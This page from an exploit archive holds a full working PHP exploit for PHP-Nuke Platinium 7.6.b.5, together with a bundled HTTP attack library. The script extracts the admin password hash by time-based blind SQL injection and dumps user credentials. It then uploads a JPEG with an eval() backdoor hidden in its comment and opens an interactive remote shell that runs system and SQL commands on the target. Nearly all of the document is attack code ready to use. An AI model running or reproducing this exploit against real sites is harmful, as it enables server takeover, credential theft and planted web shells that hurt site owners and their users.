[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit
# Published : 2008-07-01
# Author : Charles Fol
# Previous Title : VanGogh Web CMS 0.9 (article_ID) Remote SQL Injection Vulnerability
# Next Title : Efestech Shop 2.0 (cat_id) Remote SQL Injection Vulnerability
<?php
##
## PHP Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit
## Author: Charles "real" F. <charlesfol[at]hotmail.fr>
## Date: 02/07/08
##
## Note
## ****
## I modified a bit phpsploit for this exploit,
## because PHP Nuke plays with REQUEST_URI var ...
##
## Requirements
## ************
## register_globals=On
##
## phpreter
## ********
## phpreter is really easy to use:
## You can change mode using "mode=<mode>",
## with <mode> = sql, php or cmd
##
## If you want to understand how it work ...
## read the code.
##
## You can take look to unchunk() function, because
## I think you were many with this problem ...
##
#
# Configuration
#
$xpl = new phpsploit();
$xpl->agent('Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14');
print "##n";
print "## PHP Nuke Platinium 7.6.b.5n";
print "## Remote Code Execution Exploitn";
print "## by Charles <real> F. <charlesfol[at]hotmail.fr>n";
print "## [http://realn.free.fr/]n";
print "##n";
if($argc<3)
{
print "##--- USAGE -----------------------------------------------n";
print "## [c:]# php nuke_platinium_exploit.php [options]n";
print "##n";
print "## -url Target URLn";
print "## -shell If you only wan't to load again phpreter,n";
print "## specify with this param your shell URLn";
print "## -account A GOD admin account (optional)n";
print "## password can be md5 or plain textn";
print "## user:passwdn";
print "## -bmark How many time must pass to consider SQLn";
print "## returned true (in seconds) and how manyn";
print "## operations you want SQL to do (optional)n";
print "## default: 4:6000000n";
print "##n";
print "## eg:n";
print "## ./exploit.php -url http://target.net/ -bmark 5:4000000n";
print "## ./exploit.php -url http://target.net/ -admin god:pwdn";
print "## ./exploit.php -shell http://target.net/tmp_1339.phpn";
print "##---------------------------------------------------------n";
exit();
}
# Parameters
$url = getparam('url');
$shell_url = getparam('shell');
$account = getparam('account') ? getparam('account') : '';
$bmark = getparam('bmark') ? getparam('bmark') : '4:6000000';
list($bmark_time, $bmark_numb) = explode(':', $bmark);
if(!$url && !$shell_url)
{
print "## Ok dude, are you an idiot ?n";
exit();
}
# SQL Configuration for phpreter
$sql = array(
'config.php',
'$dbhost',
'$dbuname',
'$dbpass',
'$dbname',
);
if($shell_url)
{
print "##--- SHELL -----------------------------------------------n";
print "## URL: $shell_urln";
print "##---------------------------------------------------------n";
$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false);
exit();
}
if(!preg_match('#ORDER by date#',$xpl->post($url.'includes/pdf.php',"what=getpdf&table=_blocked_iplist '-")))
{
print "## register_globals=Off, exiting.n";
print "##n";
exit();
}
#
# Admin credentials
#
if(!empty($account))
{
list($aid, $pwd) = explode(':',$account);
if(!preg_match('#[a-f0-9]{32}#i',$pwd)) $pwd = md5($pwd);
}
print "##--- ADMIN -----------------------------------------------n";
print "## Admin ID: ";
isset($aid) ? print $aid."n" : $aid = bmark('aid','abcdefghijklmnopqrstuvwxyz0123456789');
print "## Password: ";
isset($pwd) ? print $pwd."n" : $pwd = bmark('pwd','abcdef0123456789');
print "##---------------------------------------------------------n";
print "##n";
#
# User data
#
# We set up admin access
$c_admin = base64_encode($aid.':'.$pwd);
$xpl->addcookie('admin', urlencode($c_admin));
# Ok, now, we need an user for the upload
$query = "SELECT CONCAT(0x3a3a3a,user_id,0x3a,username,0x3a,user_email,0x3a,user_password,0x3a3a3a) FROM nuke_users ORDER BY user_id DESC LIMIT 1";
$data = sqlexec($query);
$data = explode(':::',$data);
list($user_id, $user_name, $user_mail, $user_pwd) = explode(':',$data[1]);
$c_user = base64_encode($user_id.':'.$user_name.':'.$user_pwd);
$xpl->addcookie('user', urlencode($c_user));
# We need a valid SID
$xpl->get($url.'modules.php?name=Forums&file=profile&mode=editprofile');
preg_match('#sid" value="([a-f0-9]{32})#i', $xpl->getcontent(), $c_sid);
$c_sid = $c_sid[1];
$xpl->addcookie('_sid',$c_sid);
print "##--- USER ------------------------------------------------n";
print "## User ID : ".$user_id."n";
print "## Name : ".$user_name."n";
print "## Mail : ".$user_mail."n";
print "## Password: ".$user_pwd."n";
print "##---------------------------------------------------------n";
print "##n";
#
# Cookies
#
print "##--- COOKIES -----------------------------------n";
print "## user=".$c_user."n";
print "## admin=".$c_admin."n";
print "##---------------------------------------------------------n";
print "##n";
#
# File upload
#
print "## Uploading the file ";
$rand_filename = 'tmp_'.rand().'.php';
# Step #1: avatar_path='w00t.php�'
sqlexec("UPDATE nuke_bbconfig SET config_value='$rand_filename\0' WHERE config_name='avatar_path'");
print ".";
# Step #2: JPEG upload (bypassing restrictions)
# $c0de contains as a jpeg comment
# print '-:-';eval(stripslashes($_SERVER['HTTP_SHELL']));print '-:-';
#
# To people who is laughing to me when I stripslashes() the header:
# On specifics servers, HTTP headers are addslashed.
# This gave, in fact, the attack #2 in my Nuked-Klan sploit.
#
$c0de = ""
. "xffxd8xffxe0x00x10x4ax46x49x46x00x01x01x01x00x60"
. "x00x60x00x00xffxdbx00x43x00x08x06x06x07x06x05x08"
. "x07x07x07x09x09x08x0ax0cx14x0dx0cx0bx0bx0cx19x12"
. "x13x0fx14x1dx1ax1fx1ex1dx1ax1cx1cx20x24x2ex27x20"
. "x22x2cx23x1cx1cx28x37x29x2cx30x31x34x34x34x1fx27"
. "x39x3dx38x32x3cx2ex33x34x32xffxdbx00x43x01x09x09"
. "x09x0cx0bx0cx18x0dx0dx18x32x21x1cx21x32x32x32x32"
. "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
. "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
. "x32x32x32x32x32x32x32x32x32x32x32x32x32x32xffxfe"
. "x00x4ex3cx3fx70x68x70x20x70x72x69x6ex74x20x27x2d"
. "x3ax2dx27x3bx65x76x61x6cx28x73x74x72x69x70x73x6c"
. "x61x73x68x65x73x28x24x5fx53x45x52x56x45x52x5bx27"
. "x48x54x54x50x5fx53x48x45x4cx4cx27x5dx29x29x3bx70"
. "x72x69x6ex74x20x27x2dx3ax2dx27x3bx20x3fx3exffxc0"
. "x00x11x08x00x01x00x01x03x01x22x00x02x11x01x03x11"
. "x01xffxc4x00x1fx00x00x01x05x01x01x01x01x01x01x00"
. "x00x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09"
. "x0ax0bxffxc4x00xb5x10x00x02x01x03x03x02x04x03x05"
. "x05x04x04x00x00x01x7dx01x02x03x00x04x11x05x12x21"
. "x31x41x06x13x51x61x07x22x71x14x32x81x91xa1x08x23"
. "x42xb1xc1x15x52xd1xf0x24x33x62x72x82x09x0ax16x17"
. "x18x19x1ax25x26x27x28x29x2ax34x35x36x37x38x39x3a"
. "x43x44x45x46x47x48x49x4ax53x54x55x56x57x58x59x5a"
. "x63x64x65x66x67x68x69x6ax73x74x75x76x77x78x79x7a"
. "x83x84x85x86x87x88x89x8ax92x93x94x95x96x97x98x99"
. "x9axa2xa3xa4xa5xa6xa7xa8xa9xaaxb2xb3xb4xb5xb6xb7"
. "xb8xb9xbaxc2xc3xc4xc5xc6xc7xc8xc9xcaxd2xd3xd4xd5"
. "xd6xd7xd8xd9xdaxe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxf1"
. "xf2xf3xf4xf5xf6xf7xf8xf9xfaxffxc4x00x1fx01x00x03"
. "x01x01x01x01x01x01x01x01x01x00x00x00x00x00x00x01"
. "x02x03x04x05x06x07x08x09x0ax0bxffxc4x00xb5x11x00"
. "x02x01x02x04x04x03x04x07x05x04x04x00x01x02x77x00"
. "x01x02x03x11x04x05x21x31x06x12x41x51x07x61x71x13"
. "x22x32x81x08x14x42x91xa1xb1xc1x09x23x33x52xf0x15"
. "x62x72xd1x0ax16x24x34xe1x25xf1x17x18x19x1ax26x27"
. "x28x29x2ax35x36x37x38x39x3ax43x44x45x46x47x48x49"
. "x4ax53x54x55x56x57x58x59x5ax63x64x65x66x67x68x69"
. "x6ax73x74x75x76x77x78x79x7ax82x83x84x85x86x87x88"
. "x89x8ax92x93x94x95x96x97x98x99x9axa2xa3xa4xa5xa6"
. "xa7xa8xa9xaaxb2xb3xb4xb5xb6xb7xb8xb9xbaxc2xc3xc4"
. "xc5xc6xc7xc8xc9xcaxd2xd3xd4xd5xd6xd7xd8xd9xdaxe2"
. "xe3xe4xe5xe6xe7xe8xe9xeaxf2xf3xf4xf5xf6xf7xf8xf9"
. "xfaxffxdax00x0cx03x01x00x02x11x03x11x00x3fx00xf7"
. "xfax28xa2x80x3fxffxd9xd9";
$data = array(
frmdt_url => $url.'modules.php?name=Forums&file=profile',
'avatar' => array(frmdt_filename => '1.jpg', frmdt_type => 'image/jpeg', frmdt_content => $c0de),
'username' => $user_name, 'email' => $user_mail,
'cur_password' => '', 'new_password' => '',
'password_confirm' => '', 'icq' => '',
'aim' => '', 'msn' => '',
'yim' => '', 'website' => '',
'location' => '', 'occupation' => '',
'interests' => '', 'b_day' => '1',
'b_md' => '1', 'b_year' => '1111',
'gender' => '1', 'viewemail' => '0',
'hideonline' => '1', 'notifyreply' => '0',
'notifypm' => '0', 'popup_pm' => '0',
'attachsig' => '1', 'allowbbcode' => '1',
'allowhtml' => '1', 'allowsmilies' => '1',
'showquickreply' => '0', 'user_wordwrap' => '70',
'language' => 'english', 'style' => '1',
'timezone' => '-6', 'dateformat' => 'Y-m-d, H:i:s',
'MAX_FILE_SIZE' => '99999', 'avatarurl' => '',
'avatarremoteurl' => '', 'mode' => 'editprofile',
'agreed' => 'true', 'coppa' => '0',
'sid' => $c_sid, 'user_id' => $user_id,
'current_email' => $user_mail, 'submit' => 'Submit',
);
$xpl->formdata($data);
print ".";
# Step #3: avatar_path='modules/Forums/images/avatars'
sqlexec("UPDATE nuke_bbconfig SET config_value='modules/Forums/images/avatars' WHERE config_name='avatar_path'");
print ".n";
# Shell is uploaded, let's load it
$shell_url = $url.$rand_filename;
print "##n";
print "##--- SHELL -----------------------------------------------n";
print "## URL: $shell_urln";
print "##---------------------------------------------------------n";
$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false);
#
# Execute SQL Queries
#
function sqlexec($query)
{
global $xpl,$url;
$xpl->post($url.'modules/Forums/admin/admin_genesismyadmin.php','this_query='.urlencode($query).'&submit=&with_selected=optimize');
return $xpl->getcontent();
}
#
# Bmark SQL Injection Function
#
function bmark($query,$charset)
{
global $xpl,$url,$data,$bmark_time,$bmark_numb;
$d=0; $v='';$max=32;
$query = 'SELECT '.$query.' FROM nuke_authors WHERE radminsuper=1 ORDER BY aid LIMIT 1';
$data = "what=getpdf&table=_blocked_iplist+WHERE+IF((<sql>),BENCHMARK($bmark_numb,MD5(0x616161)),1)=1 --";
while($d<$max)
{
$d++;
for($z=0;$z<strlen($charset);$z++)
{
$f = ord(substr($charset,$z,1));
$sql = "MID(($query),$d,1)=CHAR($f)";
$date = time();
$xpl->post($url."includes/pdf.php", str_replace('<sql>',$sql,$data) );
if(time()-$date>$bmark_time)
{
print strtolower(chr($f));
$v .= chr($f);
break;
}
}
if(strlen($v)==$save) break;
$save = strlen($v);
}
print "n";
return $v;
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("n-$param parameter required");
else return;
}
/*
* Copyright (c) real
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PHPreter
* AUTHOR: Charles "real" F.
* VERSION: 1.0
* LICENSE: GNU General Public License
*
* This is a really simple class with permits to exec SQL, PHP or CMD
* on a remote host using the HTTP "Shell" header.
*
*/
class phpreter
{
var $url;
var $host;
var $port;
var $page;
var $mode;
var $ssql;
var $prompt;
var $phost;
var $regex;
var $data;
/**
* __construct()
*
* @param url The url of the remote shell.
* @param regexp The regex to catch cmd result.
* @param mode Mode: php, sql or cmd.
* @param sql An array with the file to include,
* and sql vars
* @param clear Determines if clear() is called
* on startup
*/
function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
{
$this->url = $url;
$this->regex = '#'.$regexp.'#is';
#
# Set important data
#
$infos = parse_url($this->url);
$this->host = $infos['host'];
$this->port = isset($infos['port']) ? $infos['port'] : 80;
$this->page = $infos['path'];
unset($infos);
# www.(site).com
$host_tmp = explode('.',$this->host);
$this->phost = $host_tmp[ count($host_tmp)-2 ];
unset($host_tmp);
#
# Set up MySQL connection string
#
if(!sizeof($sql)) $this->ssql = '';
elseif(sizeof($sql)==5)
{
$this->ssql = "include('$sql[0]');"
. "mysql_connect($sql[1], $sql[2], $sql[3]);"
. "mysql_select_db($sql[4]);";
}
else
{
$this->ssql = ""
. "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
. "mysql_select_db('$sql[3]');";
}
$this->setmode($mode);
#
# Main Loop
#
if($clear) $this->clear();
print $this->prompt;
while(!preg_match('#^(quit|exit|close)$#i',($cmd = trim(fgets(STDIN)))))
{
# change mode
if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) $this->setmode($array[3]);
# clear data
elseif(preg_match('#^clear$#i',$cmd)) $this->clear();
# else
else print $this->exec($cmd);
print $this->prompt;
}
}
/**
* clear()
* Just clears ouput, printing 'n'x50
*/
function clear()
{
print str_repeat("n",50);
return 0;
}
/**
* setmode()
* Set mode (PHP, CMD, SQL)
* You don't have to call it.
* use mode=[php|cmd|sql] instead,
* in the prompt.
*/
function setmode($newmode)
{
$this->mode = strtolower($newmode);
$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
switch($this->mode)
{
case 'cmd':
$this->data = 'system('<CMD>');';
break;
case 'php':
$this->data = '';
break;
case 'sql':
$this->data = $this->ssql
. '$q = mysql_query('<CMD>') or print(mysql_error());'
. 'print str_repeat("-",50)."n";'
. 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
. '{'
. 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $vn";'
. 'print str_repeat("-",50)."n";'
. '}';
break;
}
return $this->mode;
}
/**
* exec()
* Execute any query and catch the result.
* You don't have to call it.
*/
function exec($cmd)
{
if(!strlen($this->data)) $shell = $cmd;
else $shell = str_replace('<CMD>',addslashes($cmd),$this->data);
$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);
$req = "GET ".$this->page." HTTP/1.1rn";
$req .= "Host: ". $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) ."rn";
$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14rn";
$req .= "Shell: $shellrn";
$req .= "Content-transfert-encoding: base64rn";
$req .= "Connection: closernrn";
unset($shell);
fputs($fp,$req);
$content = '';
while(!feof($fp)) $content .= fgets($fp,128);
fclose($fp);
# Remove headers
$data = explode("rnrn",$content);
array_shift($data);
$content = implode("rnrn",$data);
$content = $this->unchunk($content);
preg_match($this->regex,$content,$data);
if($data[1][ strlen($data)-1 ] != "n") $data[1] .= "n";
return $data[1];
}
/**
* unchunk()
* This function aims to remove chunked content sizes which
* are putted by apache server when it uses chunked
* transfert-encoding.
*/
function unchunk($data)
{
$dsize = 1;
$offset = 0;
while($dsize>0)
{
$hsize_size = strpos($data, "rn", $offset) - $offset;
$hsize = substr($data, $offset, $hsize_size);
$dsize = hexdec($hsize);
/*
print "offset (dec) = $offsetn";
print "hsize (hex) = $hsizen";
print "dsize (dec) = $dsizen";
print "crlfp (dec) = $hsize_sizen";
print "--n";
*/
# Remove $hsizern from $data
$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
$offset += $dsize;
# Remove the rn before the next $hsize
$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
}
return $data;
}
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 4 / PHP 5
* VERSION: 2.0
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2007-06-10] (2.0)
* * Code: Code optimization
* * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
die("Error: Host seems down");
# modification (by real)
preg_match("#^http://[^/]+(/.*)$#i", $this->url, $tmp);
$tmp = $tmp[1];
if($this->method=='get')
$this->packet = 'GET '.$tmp." HTTP/1.1rn";
elseif($this->method=='post' or $this->method=='formdata')
$this->packet = 'POST '.$tmp." HTTP/1.1rn";
else
die("Error: Invalid method");
if(!empty($this->proxyuser))
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."rn";
if(!empty($this->header))
$this->packet .= $this->showheader();
if(!empty($this->cookie))
$this->packet .= 'Cookie: '.$this->showcookie()."rn";
$this->packet .= 'Host: '.$this->host."rn";
$this->packet .= "Connection: Closern";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencodedrn";
$this->packet .= 'Content-Length: '.strlen($this->data)."rnrn";
$this->packet .= $this->data."rn";
}
elseif($this->method=='formdata')
{
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."rn";
$this->packet .= 'Content-Length: '.strlen($this->data)."rnrn";
$this->packet .= $this->data;
}
$this->packet .= "rn";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket))
$this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar)
$this->getcookie();
if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}
/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie('name','value')
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();
$this->cookie[$cookn] = $cookv;
}
/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader('Client-IP', '128.5.2.3')
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();
$this->header[$headern] = $headervalue;
}
/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy('localhost',8118)
* @example $this->proxy('localhost:8118')
*
*/
function proxy($proxy,$proxyp='')
{
if(empty($proxyp))
{
$proxarr = explode(':',$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}
if($this->proxyport > 65535)
die("Error: Invalid port number");
}
/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth('user','pwd')
* @example $this->proxyauth('user:pwd');
*
*/
function proxyauth($proxyauth,$proxypass='')
{
if(empty($proxypass))
{
$posvirg = strpos($proxyauth,':');
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}
/**
* This function allows you to set
* the 'User-Agent' header.
*
* @access public
* @param string useragent Agent
* @example $this->agent('Firefox')
*
*/
function agent($useragent)
{
$this->addheader('User-Agent',$useragent);
}
/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @example $this->showheader()
*
*/
function showheader()
{
$this->header_str = '';
if(!isset($this->header))
return;
foreach($this->header as $name => $value)
$this->header_str .= $name.': '.$value."rn";
return $this->header_str;
}
/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @example $this->showcookie()
*
*/
function showcookie()
{
$this->cookie_str = '';
if(!isset($this->cookie))
return;
foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str;
}
/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}
/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get('localhost/index.php?var=x')
* @example $this->get('http://localhost:88/tst.php')
*
*/
function get($url)
{
$this->target($url);
$this->method = 'get';
return $this->sock();
}
/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post('http://localhost/','helo=x')
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = 'post';
$this->data = $data;
return $this->sock();
}
/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
* frmdt_url => 'http://localhost/upload.php',
* frmdt_boundary => '123456', # Optional
* 'var' => 'example',
* 'file' => array(
* frmdt_type => 'image/gif', # Optional
* frmdt_transfert => 'binary' # Optional
* frmdt_filename => 'hello.php,
* frmdt_content => '<?php echo 1; ?>'));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = 'formdata';
$this->data = '';
if(!isset($array[frmdt_boundary]))
$this->boundary = 'phpsploit';
else
$this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match('#^frmdt_(boundary|url)#',$key))
{
$this->data .= str_repeat('-',29).$this->boundary."rn";
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
if(!is_array($value))
{
$this->data .= "rnrn".$value."rn";
}
else
{
$this->data .= ' filename="'.$array[$key][frmdt_filename]."";rn";
if(isset($array[$key][frmdt_type]))
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."rn";
if(isset($array[$key][frmdt_transfert]))
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."rn";
$this->data .= "rn".$array[$key][frmdt_content]."rn";
}
}
}
$this->data .= str_repeat('-',29).$this->boundary."--rn";
return $this->sock();
}
/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get('http://localhost/'))
*
*/
function getcontent($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("rnrn",$code);
$this->server_content = '';
for($i=1;$i<count($code);$i++)
$this->server_content .= $code[$i];
return $this->server_content;
}
/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post('http://localhost/','1=2'))
*
*/
function getheader($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("rnrn",$code);
$this->server_header = $code[0];
return $this->server_header;
}
/**
* This function is called by the
* cookiejar() function. It adds the
* value of the "Set-Cookie" header
* in the "Cookie" header for the
* next request. You don't have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode("rn",$this->getheader()) as $header)
{
if(preg_match('/set-cookie/i',$header))
{
$fequal = strpos($header,'=');
$fvirgu = strpos($header,';');
// 12=strlen('set-cookie: ')
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
$this->cookie[trim($cname)] = trim($cvalu);
}
}
}
/**
* This function is called by the
* get()/post() functions. You
* don't have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target('http://localhost/')
*
*/
function target($urltarg)
{
if(!ereg('^http://',$urltarg))
$urltarg = 'http://'.$urltarg;
$urlarr = parse_url($urltarg);
$this->url = 'http://'.$urlarr['host'].$urlarr['path'];
if(isset($urlarr['query']))
$this->url .= '?'.$urlarr['query'];
$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
$this->host = $urlarr['host'];
if($this->port != '80')
$this->host .= ':'.$this->port;
if(!isset($urlarr['path']) or empty($urlarr['path']))
die("Error: No path precised");
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
if($this->port > 65535)
die("Error: Invalid port number");
}
/**
* If you call this function,
* the script will extract all
* 'Set-Cookie' headers values
* and it will automatically add
* them into the 'Cookie' header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code=='0')
$this->cookiejar=FALSE;
elseif($code=='1')
$this->cookiejar=TRUE;
}
/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code=='0')
$this->allowredirection=FALSE;
elseif($code=='1')
$this->allowredirection=TRUE;
}
/**
* This function is called if
* allowredirection() is enabled.
* You don't have to call it.
*
* @access private
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);
if(!ereg('://',$this->last_redirection))
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
else
return $this->get($this->last_redirection);
}
else
return $this->recv;
}
/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset('header')
* @example $this->reset('cookie')
* @example $this->reset()
*
*/
function reset($func='')
{
switch($func)
{
case 'header':
$this->header = array();
break;
case 'cookie':
$this->cookie = array();
break;
default:
$this->cookiejar = '';
$this->header = array();
$this->cookie = array();
$this->allowredirection = '';
break;
}
}
}
?>
# www.Syue.com [2008-07-01]